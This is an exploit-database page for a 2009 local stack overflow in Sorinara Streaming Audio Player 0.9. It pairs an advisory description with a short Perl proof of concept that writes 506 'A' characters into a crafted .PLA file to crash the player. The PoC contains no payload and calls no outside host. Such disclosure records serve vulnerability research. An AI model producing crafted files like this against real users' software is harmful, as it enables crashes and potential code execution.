header-logo
Suggest Exploit
vendor:
Streaming Audio Player
by:
milw0rm.com
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Streaming Audio Player
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC

A stack overflow vulnerability exists in Sorinara Streaming Audio Player 0.9. The vulnerability is caused due to a boundary error when handling .PLA files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .PLA file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### # ## ## ## ###
# #  Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ### ## ## ###
my $chars= "A" x 506;
my $file="GOLD-M.PLA";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-05-07]